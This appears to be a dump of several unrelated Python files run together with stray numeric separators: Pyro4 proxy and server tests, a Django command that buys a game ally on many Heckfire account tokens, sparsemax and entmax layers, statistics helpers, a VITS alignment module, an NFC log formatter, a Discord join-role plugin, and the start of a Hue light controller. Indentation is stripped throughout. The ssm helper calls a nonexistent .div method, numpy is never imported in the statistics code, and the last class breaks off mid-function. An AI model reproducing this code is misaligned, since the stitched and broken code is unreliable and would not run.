self.assertEqual(333, next(results))
self.assertIsNone(next(results))
self.assertRaises(ZeroDivisionError, next, results) # 999//0 should raise this error
self.assertRaises(StopIteration, next, results) # no more results should be available after the error
def testAsyncProxy(self):
with Pyro4.core.Proxy(self.objectUri) as p:
async = Pyro4.async(p)
async._pyroBind() # force that any metadata is processed
begin = time.time()
result = async.delayAndId(1, 42)
duration = time.time() - begin
self.assertTrue(duration < 0.1)
self.assertFalse(result.ready)
self.assertFalse(result.wait(0.5)) # not available within 0.5 sec
self.assertEqual("slept for 42", result.value)
self.assertTrue(result.ready)
self.assertTrue(result.wait())
def testAsyncProxyCallchain(self):
class FuncHolder(object):
count = threadutil.AtomicCounter()
def function(self, value, increase=1):
self.count.incr()
return value + increase
with Pyro4.core.Proxy(self.objectUri) as p:
async = Pyro4.async(p)
async._pyroBind() # force that any metadata is processed
holder = FuncHolder()
begin = time.time()
result = async.multiply(2, 3)
result.then(holder.function, increase=10) \
.then(holder.function, increase=5) \
.then(holder.function)
duration = time.time() - begin
self.assertTrue(duration < 0.1)
value = result.value
self.assertTrue(result.ready)
self.assertEqual(22, value)
self.assertEqual(3, holder.count.value)
def testBatchOneway(self):
with Pyro4.core.Proxy(self.objectUri) as p:
batch = Pyro4.batch(p)
self.assertIsNone(batch.multiply(7, 6))
self.assertIsNone(batch.delay(1)) # a delay shouldn't matter with oneway
self.assertIsNone(batch.multiply(3, 4))
begin = time.time()
results = batch(oneway=True)
duration = time.time() - begin
self.assertTrue(duration < 0.1, "oneway batch with delay should return almost immediately")
self.assertIsNone(results)
def testBatchAsync(self):
with Pyro4.core.Proxy(self.objectUri) as p:
batch = Pyro4.batch(p)
self.assertIsNone(batch.multiply(7, 6))
self.assertIsNone(batch.delay(1)) # a delay shouldn't matter with async
self.assertIsNone(batch.multiply(3, 4))
begin = time.time()
asyncresult = batch(async=True)
duration = time.time() - begin
self.assertTrue(duration < 0.1, "async batch with delay should return almost immediately")
results = asyncresult.value
self.assertEqual(42, next(results))
self.assertEqual("slept 1 seconds", next(results))
self.assertEqual(12, next(results))
self.assertRaises(StopIteration, next, results) # no more results should be available
def testBatchAsyncCallchain(self):
class FuncHolder(object):
count = threadutil.AtomicCounter()
def function(self, values):
result = [value + 1 for value in values]
self.count.incr()
return result
with Pyro4.core.Proxy(self.objectUri) as p:
batch = Pyro4.batch(p)
self.assertIsNone(batch.multiply(7, 6))
self.assertIsNone(batch.multiply(3, 4))
result = batch(async=True)
holder = FuncHolder()
result.then(holder.function).then(holder.function)
value = result.value
self.assertTrue(result.ready)
self.assertEqual([44, 14], value)
self.assertEqual(2, holder.count.value)
def testPyroTracebackNormal(self):
with Pyro4.core.Proxy(self.objectUri) as p:
try:
p.divide(999, 0) # force error here
self.fail("expected error")
except ZeroDivisionError:
# going to check if the magic pyro traceback attribute is available for batch methods too
tb = "".join(Pyro4.util.getPyroTraceback())
self.assertIn("Remote traceback:", tb) # validate if remote tb is present
self.assertIn("ZeroDivisionError", tb) # the error
self.assertIn("return x // y", tb) # the statement
def testPyroTracebackBatch(self):
with Pyro4.core.Proxy(self.objectUri) as p:
batch = Pyro4.batch(p)
self.assertIsNone(batch.divide(999, 0)) # force an exception here
results = batch()
try:
next(results)
self.fail("expected error")
except ZeroDivisionError:
# going to check if the magic pyro traceback attribute is available for batch methods too
tb = "".join(Pyro4.util.getPyroTraceback())
self.assertIn("Remote traceback:", tb) # validate if remote tb is present
self.assertIn("ZeroDivisionError", tb) # the error
self.assertIn("return x // y", tb) # the statement
self.assertRaises(StopIteration, next, results) # no more results should be available after the error
def testAutoProxy(self):
obj = ServerTestObject()
Pyro4.config.SERIALIZER = "pickle"
try:
with Pyro4.core.Proxy(self.objectUri) as p:
Pyro4.config.AUTOPROXY = False # make sure autoproxy is disabled
result = p.echo(obj)
self.assertIsInstance(result, ServerTestObject)
self.daemon.register(obj)
result = p.echo(obj)
self.assertIsInstance(result, ServerTestObject, "with autoproxy off the object should be an instance of the class")
self.daemon.unregister(obj)
result = p.echo(obj)
self.assertIsInstance(result, ServerTestObject, "serialized object must still be normal object")
Pyro4.config.AUTOPROXY = True # make sure autoproxying is enabled
result = p.echo(obj)
self.assertIsInstance(result, ServerTestObject, "non-pyro object must be returned as normal class")
self.daemon.register(obj)
result = p.echo(obj)
self.assertIsInstance(result, Pyro4.core.Proxy, "serialized pyro object must be a proxy")
self.daemon.unregister(obj)
result = p.echo(obj)
self.assertIsInstance(result, ServerTestObject, "unregistered pyro object must be normal class again")
# note: the custom serializer may still be active but it should be smart enough to see
# that the object is no longer a pyro object, and therefore, no proxy should be created.
finally:
Pyro4.config.AUTOPROXY = True
Pyro4.config.SERIALIZER = "serpent"
def testConnectOnce(self):
with Pyro4.core.Proxy(self.objectUri) as proxy:
self.assertTrue(proxy._pyroBind(), "first bind should always connect")
self.assertFalse(proxy._pyroBind(), "second bind should not connect again")
def testConnectingThreads(self):
class ConnectingThread(threadutil.Thread):
new_connections = threadutil.AtomicCounter()
def __init__(self, proxy, event):
threadutil.Thread.__init__(self)
self.proxy = proxy
self.event = event
self.setDaemon(True)
self.new_connections.reset()
def run(self):
self.event.wait()
if self.proxy._pyroBind():
ConnectingThread.new_connections.incr() # 1 more new connection done
with Pyro4.core.Proxy(self.objectUri) as proxy:
event = threadutil.Event()
threads = [ConnectingThread(proxy, event) for _ in range(20)]
for t in threads:
t.start()
event.set()
for t in threads:
t.join()
self.assertEqual(1, ConnectingThread.new_connections.value) # proxy shared among threads must still have only 1 connect done
def testMaxMsgSize(self):
with Pyro4.core.Proxy(self.objectUri) as p:
bigobject = [42] * 1000
result = p.echo(bigobject)
self.assertEqual(result, bigobject)
Pyro4.config.MAX_MESSAGE_SIZE = 999
try:
_ = p.echo(bigobject)
self.fail("should fail with ProtocolError msg too large")
except Pyro4.errors.ProtocolError:
pass
Pyro4.config.MAX_MESSAGE_SIZE = 0
def testCleanup(self):
p1 = Pyro4.core.Proxy(self.objectUri)
p2 = Pyro4.core.Proxy(self.objectUri)
p3 = Pyro4.core.Proxy(self.objectUri)
p1.echo(42)
p2.echo(42)
p3.echo(42)
# we have several active connections still up, see if we can cleanly shutdown the daemon
# (it should interrupt the worker's socket connections)
time.sleep(0.1)
self.daemon.shutdown()
self.daemon = None
p1._pyroRelease()
p2._pyroRelease()
p3._pyroRelease()
class ServerTestsThreadNoTimeout(unittest.TestCase):
SERVERTYPE = "thread"
COMMTIMEOUT = None
def setUp(self):
Pyro4.config.LOGWIRE = True
Pyro4.config.POLLTIMEOUT = 0.1
Pyro4.config.SERVERTYPE = self.SERVERTYPE
Pyro4.config.COMMTIMEOUT = self.COMMTIMEOUT
Pyro4.config.SERIALIZERS_ACCEPTED.add("pickle")
self.daemon = Pyro4.core.Daemon(port=0)
obj = ServerTestObject()
uri = self.daemon.register(obj, "something")
self.objectUri = uri
self.daemonthread = DaemonLoopThread(self.daemon)
self.daemonthread.start()
self.daemonthread.running.wait()
time.sleep(0.05)
def tearDown(self):
time.sleep(0.05)
self.daemon.shutdown()
self.daemonthread.join()
Pyro4.config.SERVERTYPE = "thread"
Pyro4.config.COMMTIMEOUT = None
Pyro4.config.SERIALIZERS_ACCEPTED.discard("pickle")
def testConnectionStuff(self):
p1 = Pyro4.core.Proxy(self.objectUri)
p2 = Pyro4.core.Proxy(self.objectUri)
self.assertIsNone(p1._pyroConnection)
self.assertIsNone(p2._pyroConnection)
p1.ping()
p2.ping()
_ = p1.multiply(11, 5)
_ = p2.multiply(11, 5)
self.assertIsNotNone(p1._pyroConnection)
self.assertIsNotNone(p2._pyroConnection)
p1._pyroRelease()
p1._pyroRelease()
p2._pyroRelease()
p2._pyroRelease()
self.assertIsNone(p1._pyroConnection)
self.assertIsNone(p2._pyroConnection)
p1._pyroBind()
_ = p1.multiply(11, 5)
_ = p2.multiply(11, 5)
self.assertIsNotNone(p1._pyroConnection)
self.assertIsNotNone(p2._pyroConnection)
self.assertEqual("PYRO", p1._pyroUri.protocol)
self.assertEqual("PYRO", p2._pyroUri.protocol)
p1._pyroRelease()
p2._pyroRelease()
def testReconnectAndCompression(self):
# try reconnects
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertIsNone(p._pyroConnection)
p._pyroReconnect(tries=100)
self.assertIsNotNone(p._pyroConnection)
self.assertIsNone(p._pyroConnection)
# test compression:
try:
with Pyro4.core.Proxy(self.objectUri) as p:
Pyro4.config.COMPRESSION = True
self.assertEqual(55, p.multiply(5, 11))
self.assertEqual("*" * 1000, p.multiply("*" * 500, 2))
finally:
Pyro4.config.COMPRESSION = False
def testOnewayMetaOn(self):
Pyro4.config.METADATA = True
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual(set(), p._pyroOneway) # when not bound, no meta info exchange has been done
p._pyroBind()
self.assertIn("oneway_multiply", p._pyroOneway) # after binding, meta info has been processed
self.assertEqual(55, p.multiply(5, 11)) # not tagged as @Pyro4.oneway
self.assertIsNone(p.oneway_multiply(5, 11)) # tagged as @Pyro4.oneway
p._pyroOneway = set()
self.assertEqual(55, p.multiply(5, 11))
self.assertEqual(55, p.oneway_multiply(5, 11))
# check nonexisting method behavoir for oneway methods
with self.assertRaises(AttributeError):
p.nonexisting_method()
p._pyroOneway.add("nonexisting_method")
# now it should still fail because of metadata telling Pyro what methods actually exist
with self.assertRaises(AttributeError):
p.nonexisting_method()
def testOnewayMetaOff(self):
Pyro4.config.METADATA = False
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual(set(), p._pyroOneway) # when not bound, no meta info exchange has been done
p._pyroBind()
self.assertEqual(set(), p._pyroOneway) # after binding, no meta info exchange has been done because disabled
self.assertEqual(55, p.multiply(5, 11))
self.assertEqual(55, p.oneway_multiply(5, 11))
# check nonexisting method behavoir for oneway methods
with self.assertRaises(AttributeError):
p.nonexisting_method()
p._pyroOneway.add("nonexisting_method")
# now it shouldn't fail because of oneway semantics (!) (and becaue there's no metadata to tell Pyro that the method doesn't exist)
p.nonexisting_method()
Pyro4.config.METADATA = True
def testOnewayWithProxySubclass(self):
Pyro4.config.METADATA = False
class ProxyWithOneway(Pyro4.core.Proxy):
def __init__(self, arg):
super(ProxyWithOneway, self).__init__(arg)
self._pyroOneway = {"oneway_multiply", "multiply"}
with ProxyWithOneway(self.objectUri) as p:
self.assertIsNone(p.oneway_multiply(5, 11))
self.assertIsNone(p.multiply(5, 11))
p._pyroOneway = set()
self.assertEqual(55, p.oneway_multiply(5, 11))
self.assertEqual(55, p.multiply(5, 11))
Pyro4.config.METADATA = True
def testOnewayDelayed(self):
try:
with Pyro4.core.Proxy(self.objectUri) as p:
p.ping()
Pyro4.config.ONEWAY_THREADED = True # the default
now = time.time()
p.oneway_delay(1) # oneway so we should continue right away
self.assertTrue(time.time() - now < 0.2, "delay should be running as oneway")
now = time.time()
self.assertEqual(55, p.multiply(5, 11), "expected a normal result from a non-oneway call")
self.assertTrue(time.time() - now < 0.2, "delay should be running in its own thread")
# make oneway calls run in the server thread
# we can change the config here and the server will pick it up on the fly
Pyro4.config.ONEWAY_THREADED = False
now = time.time()
p.oneway_delay(1) # oneway so we should continue right away
self.assertTrue(time.time() - now < 0.2, "delay should be running as oneway")
now = time.time()
self.assertEqual(55, p.multiply(5, 11), "expected a normal result from a non-oneway call")
self.assertFalse(time.time() - now < 0.2, "delay should be running in the server thread")
finally:
Pyro4.config.ONEWAY_THREADED = True # back to normal
def testSerializeConnected(self):
# online serialization tests
ser = Pyro4.util.get_serializer(Pyro4.config.SERIALIZER)
proxy = Pyro4.core.Proxy(self.objectUri)
proxy._pyroBind()
self.assertIsNotNone(proxy._pyroConnection)
p, _ = ser.serializeData(proxy)
proxy2 = ser.deserializeData(p)
self.assertIsNone(proxy2._pyroConnection)
self.assertIsNotNone(proxy._pyroConnection)
self.assertEqual(proxy2._pyroUri, proxy._pyroUri)
proxy2._pyroBind()
self.assertIsNotNone(proxy2._pyroConnection)
self.assertIsNot(proxy2._pyroConnection, proxy._pyroConnection)
proxy._pyroRelease()
proxy2._pyroRelease()
self.assertIsNone(proxy._pyroConnection)
self.assertIsNone(proxy2._pyroConnection)
proxy.ping()
proxy2.ping()
# try copying a connected proxy
import copy
proxy3 = copy.copy(proxy)
self.assertIsNone(proxy3._pyroConnection)
self.assertIsNotNone(proxy._pyroConnection)
self.assertEqual(proxy3._pyroUri, proxy._pyroUri)
self.assertIsNot(proxy3._pyroUri, proxy._pyroUri)
proxy._pyroRelease()
proxy2._pyroRelease()
proxy3._pyroRelease()
def testException(self):
with Pyro4.core.Proxy(self.objectUri) as p:
try:
p.divide(1, 0)
except:
et, ev, tb = sys.exc_info()
self.assertEqual(ZeroDivisionError, et)
pyrotb = "".join(Pyro4.util.getPyroTraceback(et, ev, tb))
self.assertIn("Remote traceback", pyrotb)
self.assertIn("ZeroDivisionError", pyrotb)
del tb
def testTimeoutCall(self):
Pyro4.config.COMMTIMEOUT = None
with Pyro4.core.Proxy(self.objectUri) as p:
p.ping()
start = time.time()
p.delay(0.5)
duration = time.time() - start
self.assertTrue(0.4 < duration < 0.6)
p._pyroTimeout = 0.1
start = time.time()
self.assertRaises(Pyro4.errors.TimeoutError, p.delay, 1)
duration = time.time() - start
if sys.platform != "cli":
self.assertAlmostEqual(0.1, duration, places=1)
else:
# ironpython's time is weird
self.assertTrue(0.0 < duration < 0.7)
def testTimeoutConnect(self):
# set up a unresponsive daemon
with Pyro4.core.Daemon(port=0) as d:
time.sleep(0.5)
obj = ServerTestObject()
uri = d.register(obj)
# we're not going to start the daemon's event loop
p = Pyro4.core.Proxy(uri)
p._pyroTimeout = 0.2
start = time.time()
with self.assertRaises(Pyro4.errors.TimeoutError) as e:
p.ping()
self.assertEqual("receiving: timeout", str(e.exception))
def testProxySharing(self):
class SharedProxyThread(threadutil.Thread):
def __init__(self, proxy):
super(SharedProxyThread, self).__init__()
self.proxy = proxy
self.terminate = False
self.error = True
self.setDaemon(True)
def run(self):
try:
while not self.terminate:
reply = self.proxy.multiply(5, 11)
assert reply == 55
time.sleep(0.001)
self.error = False
except:
print("Something went wrong in the thread (SharedProxyThread):")
print("".join(Pyro4.util.getPyroTraceback()))
with Pyro4.core.Proxy(self.objectUri) as p:
threads = []
for i in range(5):
t = SharedProxyThread(p)
threads.append(t)
t.start()
time.sleep(1)
for t in threads:
t.terminate = True
t.join()
for t in threads:
self.assertFalse(t.error, "all threads should report no errors")
def testServerConnections(self):
# check if the server allows to grow the number of connections
proxies = [Pyro4.core.Proxy(self.objectUri) for _ in range(10)]
try:
for p in proxies:
p._pyroTimeout = 0.5
p._pyroBind()
for p in proxies:
p.ping()
finally:
for p in proxies:
p._pyroRelease()
def testServerParallelism(self):
class ClientThread(threadutil.Thread):
def __init__(self, uri, name):
super(ClientThread, self).__init__()
self.setDaemon(True)
self.proxy = Pyro4.core.Proxy(uri)
self.name = name
self.error = True
self.proxy._pyroTimeout = 5.0
self.proxy._pyroBind()
def run(self):
try:
reply = self.proxy.delayAndId(0.5, self.name)
assert reply == "slept for " + self.name
self.error = False
finally:
self.proxy._pyroRelease()
threads = []
start = time.time()
try:
for i in range(6):
t = ClientThread(self.objectUri, "t%d" % i)
threads.append(t)
except:
# some exception (probably timeout) while creating clients
# try to clean up some connections first
for t in threads:
t.proxy._pyroRelease()
raise # re-raise the exception
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(t.error, "all threads should report no errors")
del threads
duration = time.time() - start
if Pyro4.config.SERVERTYPE == "multiplex":
# multiplex based server doesn't execute calls in parallel,
# so 6 threads times 0.5 seconds =~ 3 seconds
self.assertTrue(2.5 < duration < 3.5)
else:
# thread based server does execute calls in parallel,
# so 6 threads taking 0.5 seconds =~ 0.5 seconds passed
self.assertTrue(0.4 < duration < 0.9)
class ServerTestsMultiplexNoTimeout(ServerTestsThreadNoTimeout):
SERVERTYPE = "multiplex"
COMMTIMEOUT = None
def testProxySharing(self):
pass
def testException(self):
pass
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 43,110 | 13,243 |
from django.core.management.base import BaseCommand, CommandError
from api import HeckfireApi, TokenException
from django.conf import settings
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = 'Volly an ally via supplied username'
def add_arguments(self, parser):
parser.add_argument('username', type=str)
def handle(self, *args, **options):
"""
This class find an ally through the supplied username, and
will cycle through each token purchasing the ally on each account.
Usage: python manage.py volly_ally username "kevz"
"""
staytoken = settings.STAY_ALIVE_TOKEN
tokens = settings.TOKENS
username = options['username']
for token in tokens:
api = HeckfireApi(token=token, staytoken=staytoken)
ally = api.get_ally_by_name(username)
try:
user_id = ally['allies'][0]["user_id"]
cost = ally['allies'][0]["cost"]
try:
api.collect_loot()
api.buy_ally(user_id, cost)
api.stay_alive()
logger.info(f"Buying '{username}', ID: {user_id}, Cost: {cost}")
except TokenException as e:
logger.info(f"Exception: {e}")
except IndexError as e:
logger.info(f"User does not exist") | 1,394 | 395 |
from typing import Any, Tuple, Union
import torch
import torch.nn as nn
from entmax import entmax_bisect
class _Sparsemax1(torch.autograd.Function):
"""adapted from https://github.com/aced125/sparsemax/tree/master/sparsemax"""
@staticmethod
def forward(ctx: Any, input: torch.Tensor, dim: int = -1) -> torch.Tensor: # noqa
input_dim = input.dim()
if input_dim <= dim or dim < -input_dim:
raise IndexError(
f"Dimension out of range (expected to be in range of [-{input_dim}, {input_dim - 1}], but got {dim})"
)
# Save operating dimension to context
ctx.needs_reshaping = input_dim > 2
ctx.dim = dim
if ctx.needs_reshaping:
ctx, input = _Sparsemax1._flatten_all_but_nth_dim(ctx, input)
# Translate by max for numerical stability
input = input - input.max(-1, keepdim=True).values.expand_as(input)
zs = input.sort(-1, descending=True).values
range = torch.arange(1, input.size()[-1] + 1)
range = range.expand_as(input).to(input)
# Determine sparsity of projection
bound = 1 + range * zs
is_gt = bound.gt(zs.cumsum(-1)).type(input.dtype)
k = (is_gt * range).max(-1, keepdim=True).values
# Compute threshold
zs_sparse = is_gt * zs
# Compute taus
taus = (zs_sparse.sum(-1, keepdim=True) - 1) / k
taus = taus.expand_as(input)
output = torch.max(torch.zeros_like(input), input - taus)
# Save context
ctx.save_for_backward(output)
# Reshape back to original shape
if ctx.needs_reshaping:
ctx, output = _Sparsemax1._unflatten_all_but_nth_dim(ctx, output)
return output
@staticmethod
def backward(ctx: Any, grad_output: torch.Tensor) -> Tuple[torch.Tensor, None]: # noqa
output, *_ = ctx.saved_tensors
# Reshape if needed
if ctx.needs_reshaping:
ctx, grad_output = _Sparsemax1._flatten_all_but_nth_dim(ctx, grad_output)
# Compute gradient
nonzeros = torch.ne(output, 0)
num_nonzeros = nonzeros.sum(-1, keepdim=True)
sum = (grad_output * nonzeros).sum(-1, keepdim=True) / num_nonzeros
grad_input = nonzeros * (grad_output - sum.expand_as(grad_output))
# Reshape back to original shape
if ctx.needs_reshaping:
ctx, grad_input = _Sparsemax1._unflatten_all_but_nth_dim(ctx, grad_input)
return grad_input, None
@staticmethod
def _flatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
"""
Flattens tensor in all but 1 chosen dimension.
Saves necessary context for backward pass and unflattening.
"""
# transpose batch and nth dim
x = x.transpose(0, ctx.dim)
# Get and save original size in context for backward pass
original_size = x.size()
ctx.original_size = original_size
# Flatten all dimensions except nth dim
x = x.reshape(x.size(0), -1)
# Transpose flattened dimensions to 0th dim, nth dim to last dim
return ctx, x.transpose(0, -1)
@staticmethod
def _unflatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
"""
Unflattens tensor using necessary context
"""
# Tranpose flattened dim to last dim, nth dim to 0th dim
x = x.transpose(0, 1)
# Reshape to original size
x = x.reshape(ctx.original_size)
# Swap batch dim and nth dim
return ctx, x.transpose(0, ctx.dim)
class _Sparsemax2(torch.autograd.Function):
# credits to Yandex https://github.com/Qwicen/node/blob/master/lib/nn_utils.py
# TODO this version fails gradient checking - refer to tests - check why?
"""
An implementation of sparsemax (Martins & Astudillo, 2016). See
:cite:`DBLP:journals/corr/MartinsA16` for detailed description.
By Ben Peters and Vlad Niculae
"""
@staticmethod
def forward(ctx, input, dim=-1): # noqa
"""sparsemax: normalizing sparse transform (a la softmax)
Parameters
----------
ctx : torch.autograd.function._ContextMethodMixin
input : torch.Tensor
any shape
dim : int
dimension along which to apply sparsemax
Returns
-------
output : torch.Tensor
same shape as input
"""
ctx.dim = dim
max_val, _ = input.max(dim=dim, keepdim=True)
input -= max_val # same numerical stability trick as for softmax
tau, supp_size = _Sparsemax2._threshold_and_support(input, dim=dim)
output = torch.clamp(input - tau, min=0)
ctx.save_for_backward(supp_size, output)
return output
@staticmethod
def backward(ctx, grad_output): # noqa
supp_size, output = ctx.saved_tensors
dim = ctx.dim
grad_input = grad_output.clone()
grad_input[output == 0] = 0
v_hat = grad_input.sum(dim=dim) / supp_size.to(output.dtype).squeeze()
v_hat = v_hat.unsqueeze(dim)
grad_input = torch.where(output != 0, grad_input - v_hat, grad_input)
return grad_input, None
@staticmethod
def _threshold_and_support(input, dim=-1):
"""Sparsemax building block: compute the threshold
Parameters
----------
input: torch.Tensor
any dimension
dim : int
dimension along which to apply the sparsemax
Returns
-------
tau : torch.Tensor
the threshold value
support_size : torch.Tensor
"""
input_srt, _ = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
rhos = _Sparsemax2._make_ix_like(input, dim)
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return tau, support_size
@staticmethod
def _make_ix_like(input, dim=0):
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
return rho.view(view).transpose(0, dim)
class Sparsemax(nn.Module):
def __init__(self, dim: int = -1):
super(Sparsemax, self).__init__()
self.dim = dim
self.sparsemax = _Sparsemax1.apply
def forward(self, input: torch.Tensor) -> torch.Tensor:
return self.sparsemax(input, self.dim)
class EntmaxBisect(nn.Module):
def __init__(self, alpha: Union[nn.Parameter, float] = 1.5, dim: int = -1, n_iter: int = 50):
super().__init__()
self.dim = dim
self.n_iter = n_iter
self.alpha = alpha
def forward(self, X):
return entmax_bisect(
X, alpha=self.alpha, dim=self.dim, n_iter=self.n_iter
)
| 7,030 | 2,376 |
from scipy.spatial.distance import cdist, euclidean
def geometric_median(X, eps=1e-5):
"""Computes the geometric median of the columns of X, up to a tolerance epsilon.
The geometric median is the vector that minimizes the mean Euclidean norm to
each column of X.
"""
y = np.mean(X, 0)
while True:
D = cdist(X, [y])
nonzeros = (D != 0)[:, 0]
Dinv = 1 / D[nonzeros]
Dinvs = np.sum(Dinv)
W = Dinv / Dinvs
T = np.sum(W * X[nonzeros], 0)
num_zeros = len(X) - np.sum(nonzeros)
if num_zeros == 0:
y1 = T
elif num_zeros == len(X):
return y
else:
R = (T - y) * Dinvs
r = np.linalg.norm(R)
rinv = 0 if r == 0 else num_zeros/r
y1 = max(0, 1-rinv)*T + min(1, rinv)*y
if euclidean(y, y1) < eps:
return y1
y = y1
def ssm(X, alpha=1):
"""Computes stabilized sample mean (Orenstein, 2019) of each column of X
Args:
alpha: if infinity, recovers the mean; if 0 approximates median
"""
# Compute first, second, and third uncentered moments
mu = np.mean(X,0)
mu2 = np.mean(np.square(X),0)
mu3 = np.mean(np.power(X,3),0)
# Return mean - (third central moment)/(3*(2+numrows(X))*variance)
return mu - (mu3 - 3*mu*mu2+2*np.power(mu,3)).div(3*(2+alpha*X.shape[0])*(mu2 - np.square(mu)))
| 1,423 | 547 |
"""Maximum path calculation module.
This code is based on https://github.com/jaywalnut310/vits.
"""
import warnings
import numpy as np
import torch
from numba import njit, prange
try:
from .core import maximum_path_c
is_cython_avalable = True
except ImportError:
is_cython_avalable = False
warnings.warn(
"Cython version is not available. Fallback to 'EXPERIMETAL' numba version. "
"If you want to use the cython version, please build it as follows: "
"`cd espnet2/gan_tts/vits/monotonic_align; python setup.py build_ext --inplace`"
)
def maximum_path(neg_x_ent: torch.Tensor, attn_mask: torch.Tensor) -> torch.Tensor:
"""Calculate maximum path.
Args:
neg_x_ent (Tensor): Negative X entropy tensor (B, T_feats, T_text).
attn_mask (Tensor): Attention mask (B, T_feats, T_text).
Returns:
Tensor: Maximum path tensor (B, T_feats, T_text).
"""
device, dtype = neg_x_ent.device, neg_x_ent.dtype
neg_x_ent = neg_x_ent.cpu().numpy().astype(np.float32)
path = np.zeros(neg_x_ent.shape, dtype=np.int32)
t_t_max = attn_mask.sum(1)[:, 0].cpu().numpy().astype(np.int32)
t_s_max = attn_mask.sum(2)[:, 0].cpu().numpy().astype(np.int32)
if is_cython_avalable:
maximum_path_c(path, neg_x_ent, t_t_max, t_s_max)
else:
maximum_path_numba(path, neg_x_ent, t_t_max, t_s_max)
return torch.from_numpy(path).to(device=device, dtype=dtype)
@njit
def maximum_path_each_numba(path, value, t_y, t_x, max_neg_val=-np.inf):
"""Calculate a single maximum path with numba."""
index = t_x - 1
for y in range(t_y):
for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)):
if x == y:
v_cur = max_neg_val
else:
v_cur = value[y - 1, x]
if x == 0:
if y == 0:
v_prev = 0.0
else:
v_prev = max_neg_val
else:
v_prev = value[y - 1, x - 1]
value[y, x] += max(v_prev, v_cur)
for y in range(t_y - 1, -1, -1):
path[y, index] = 1
if index != 0 and (index == y or value[y - 1, index] < value[y - 1, index - 1]):
index = index - 1
@njit(parallel=True)
def maximum_path_numba(paths, values, t_ys, t_xs):
"""Calculate batch maximum path with numba."""
for i in prange(paths.shape[0]):
maximum_path_each_numba(paths[i], values[i], t_ys[i], t_xs[i])
| 2,493 | 966 |
from plugins.c2c_pb2 import NFCData
from plugins.c2s_pb2 import ServerData
def format_data(data):
if len(data) == 0:
return ""
nfc_data = NFCData()
nfc_data.ParseFromString(data)
letter = "C" if nfc_data.data_source == NFCData.CARD else "R"
initial = "(initial) " if nfc_data.data_type == NFCData.INITIAL else ""
return "%s: %s%s" % (letter, initial, bytes(nfc_data.data))
def handle_data(log, data):
server_message = ServerData()
server_message.ParseFromString(data)
log(ServerData.Opcode.Name(server_message.opcode), format_data(server_message.data))
return data
| 620 | 225 |
from datetime import datetime, timedelta
import gevent
from disco.types.base import SlottedModel
from disco.types.guild import VerificationLevel
from disco.util.snowflake import to_datetime
from rowboat.plugins import RowboatPlugin as Plugin
from rowboat.types import Field, snowflake
from rowboat.types.plugin import PluginConfig
class JoinPluginConfigAdvanced(SlottedModel):
low = Field(int, default=0)
medium = Field(int, default=5)
high = Field(int, default=10)
highest = Field(int, default=30, alias='extreme') # Disco calls it extreme, the client calls it Highest.
class JoinPluginConfig(PluginConfig):
join_role = Field(snowflake, default=None)
security = Field(bool, default=False)
advanced = Field(JoinPluginConfigAdvanced)
pass
@Plugin.with_config(JoinPluginConfig)
class JoinPlugin(Plugin):
@Plugin.listen('GuildMemberAdd')
def on_guild_member_add(self, event):
if event.member.user.bot:
return # I simply do not care
verification_level = event.guild.verification_level
if not event.config.security:
# Let's assume that if the server has join roles enabled and security disabled,
# they don't care about email verification.
try:
event.member.add_role(event.config.join_role)
except:
print("Failed to add_role in join plugin for user {} in {}. join_role may be None? It is currently: {}".format(
event.member.id, event.guild.id, event.config.join_role))
return
if verification_level is VerificationLevel.LOW: # "Must have a verified email on their Discord account"
# We take a "guess" that if the server has join roles enabled, they don't care about email verification.
event.member.add_role(event.config.join_role)
gevent.spawn_later(event.config.advanced.low, event.member.add_role, event.config.join_role)
return
if verification_level is VerificationLevel.MEDIUM:
gevent.spawn_later(event.config.advanced.medium, event.member.add_role, event.config.join_role)
if verification_level is VerificationLevel.HIGH:
gevent.spawn_later(event.config.advanced.high, event.member.add_role, event.config.join_role)
if verification_level is VerificationLevel.EXTREME:
gevent.spawn_later(event.config.advanced.highest, event.member.add_role, event.config.join_role)
@Plugin.command('debugdelay', '[length:int]', group='join', level=-1)
def trigger_delay(self, event, length: int = None):
length = length if length else 10
msg = event.channel.send_message("Sending later...")
def calc_timediff():
return "Scheduled for {} after trigger, took {}".format(length, (datetime.now() - to_datetime(msg.id)))
gevent.spawn_later(length,
lambda: event.channel.send_message("Scheduled for {} after trigger, took {}"
.format(length, (
datetime.now() - to_datetime(msg.id)) / timedelta(seconds=1))))
| 3,191 | 920 |
# encoding: utf-8
from __future__ import unicode_literals
import colorsys
import datetime
import json
import os
import random
import sys
import time
from packages.workflow import Workflow3 as Workflow
import colors
import harmony
import request
import setup
import utils
class HueAction:
def __init__(self):
self.hue_request = request.HueRequest()
def _get_xy_color(self, color, gamut):
"""Validate and convert hex color to XY space."""
return colors.Converter(gamut).hex_to_xy(utils.get_color_value(color))
def _get_random_xy_color(self, gamut):
random_color = colorsys.hsv_to_rgb(random.random(), 1, 1)
random_color = tuple([255 * x for x in random_color])
return colors.Converter(gamut).rgb_to_xy(*random_color)
def _set_palette(self, lids, palette):
for index, lid in enumerate(lids):
self.hue_request.request(
'put',
'/lights/%s/state' % lid,
json.dumps({'xy': palette[index]})
)
def _shuffle_group(self, group_id):
lights = utils.get_lights()
lids = utils.get_group_lids(group_id)
# Only shuffle the lights that are on
on_lids = [lid for lid in lids if lights[lid]['state']['on']]
on_xy = [lights[lid]['state']['xy'] for lid in on_lids]
shuffled = list(on_xy)
# Shuffle until all indexes are different (generate a derangement)
while not all([on_xy[i] != shuffled[i] for i in range(len(on_xy))]):
random.shuffle(shuffled)
self._set_palette(on_lids, shuffled)
def _set_harmony(self, group_id, mode, root):
lights = utils.get_lights()
lids = utils.get_group_lids(group_id)
palette = []
